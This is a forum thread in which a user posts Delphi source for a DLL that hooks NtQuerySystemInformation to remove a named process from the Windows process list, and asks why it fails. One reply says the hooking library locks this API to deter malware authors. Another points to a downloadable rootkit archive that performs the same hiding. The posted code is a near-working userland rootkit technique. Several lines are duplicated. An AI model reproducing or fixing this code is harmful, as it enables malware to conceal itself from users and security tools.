Why doesnt this work?
Why doesnt this work?
HookCode(@NtQuerySystemInformation, @NtQuerySystemInformationCallback, @NtQuerySystemInformationNextHook);
It say "Undeclared Identifier: NtQuerySystemInformation" to the first parameter
It say "Undeclared Identifier: NtQuerySystemInformation" to the first parameter
I want to make a process invisible.
But don't think that it will be a virus. I just want to show my friend (Delphi coder too) that it is possible to hide a process in the task manager. He says its impossible
But as I said I wont abuse it, I read you license agreement and accepted
But well, shouldn't this work? It doesn't it
But don't think that it will be a virus. I just want to show my friend (Delphi coder too) that it is possible to hide a process in the task manager. He says its impossible
But as I said I wont abuse it, I read you license agreement and accepted
But well, shouldn't this work? It doesn't it
Code: Select all
Library Proof;
uses windows, MadCodeHook;
var NtQuerySystemInformationNextHook:function(
SystemInformationClass: DWord;
SystemInformation: Pointer;
SystemInformationLength: ULong;
ReturnLength:PULong): ULong;stdcall;
type
IO_COUNTERS = record
ReadOperationCount:Int64;
WriteOperationCount:Int64;
OtherOperationCount:Int64;
ReadTransferCount:Int64;
WriteTransferCount:Int64;
OtherTransferCount:Int64;
end;
type
VM_COUNTERS = record
PeakVirtualSize:ULONG;
VirtualSize:ULONG;
PageFaultCount:ULONG;
PeakWorkingSetSize:ULONG;
WorkingSetSize:ULONG;
QuotaPeakedPagedPoolUsage:ULONG;
QuotaPagedPoolUsage:ULONG;
QuotaPeakNonPagedPoolUsage:ULONG;
QuotaNonPagedPoolUsage:ULONG;
PagefileUsage:ULONG;
PeakPagefileUsage:ULONG;
end;
type
SYSTEM_PROCESS = record
NextEntryDelta:ULONG;
ThreadCount:ULONG;
Reserved:array[0..5] of ULONG;
CreateTime:LARGE_INTEGER;
UserTime:LARGE_INTEGER;
KernelTime:LARGE_INTEGER;
ProcessName:PWideChar;
BasePriority:DWORD;
ProcessID:ULONG;
InheritedFromProcessID:ULONG;
HandleCount:ULONG;
Reserved2:array[0..1] of ULONG;
VmCounters:VM_COUNTERS;
IoCounters:IO_COUNTERS;
Threads:Pointer;
end;
type PSYSTEM_PROCESS = ^SYSTEM_PROCESS;
function NtQuerySystemInformationCallback(
SystemInformationClass:DWORD;
SystemInformation:Pointer;
SystemInformationLength:ULONG;
ReturnLength:PULONG):ULONG;
var iChanged:Integer;
pCurrent, pLast:PSYSTEM_PROCESS;
begin
result := NtQuerySystemInformationNextHook(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);
iChanged:=0;
if (result <> 0) then exit;
if (SystemInformationClass <> 5) then exit;
pCurrent := PSYSTEM_PROCESS(SystemInformation);
pLast := nil;
while (pCurrent <> nil) do
begin
if (WideCharToString(pCurrent.ProcessName) = 'IEXPLORE.EXE') then
begin
inc(iChanged);
if (pLast <> nil) then
begin
if (pCurrent.NextEntryDelta <> 0) then
begin
inc(pLast.NextEntryDelta, pCurrent.NextEntryDelta);
end //NextEntryDelta <> 0
else
begin
pLast.NextEntryDelta := 0;
end //NextEntryDelta = 0
end //pLast <> nil
else
begin
if (pCurrent.NextEntryDelta <> 0) then
begin
SystemInformation := Pointer(DWORD(SystemInformation) + pCurrent.NextEntryDelta);
end
else
begin
SystemInformation := nil;
end;
end; //pLast = nil
end; //found our proc
if (iChanged = 0) then
begin
pLast := pCurrent;
end;
if (pCurrent.NextEntryDelta <> 0) then
begin
pCurrent := PSYSTEM_PROCESS(Pointer(DWORD(pCurrent) + pCurrent.NextEntryDelta));
end
else pCurrent := nil;
end;
end;
begin
//HookCode(@NtQuerySystemInformation, @NtQuerySystemInformationCallback, @NtQuerySystemInformationNextHook);
HookAPI('Ntdll.dll','NtQuerySystemInformation',@NtQuerySystemInformationCallback,@NtQuerySystemInformationNextHook);
end.
Don't know, maybe "if (WideCharToString(pCurrent.ProcessName) = 'IEXPLORE.EXE') then" fails? Not sure whether NtQuerySystemInformation returns all caps.
Btw, you can hook NtQuerySystemInformation only with the commercial version of madCodeHook. This API is locked in the non-commercial version, so that virus/trojan programmers don't get tempted to misuse madCodeHook.
Btw, you can hook NtQuerySystemInformation only with the commercial version of madCodeHook. This API is locked in the non-commercial version, so that virus/trojan programmers don't get tempted to misuse madCodeHook.
If you really want to hook NtQuerySystemInformation that much visit http://iamaphex.net and download the file AFXRK2K4.zip. Inside is an Exe and a dll delphi project which hooks the above mentioned API. I tried it and it works. You can even inject it with madCodeHook. But please don't use it for ill purposes.
madCodeHook must be a better product, because madshi is selling it
i have implemented a little code hook
www.arschvoll.net/myhook.txt
it should be able to hook NtQuerySystemInformation but its not recalculating a jump or call on the begin of the hook function
i have implemented a little code hook
www.arschvoll.net/myhook.txt
it should be able to hook NtQuerySystemInformation but its not recalculating a jump or call on the begin of the hook function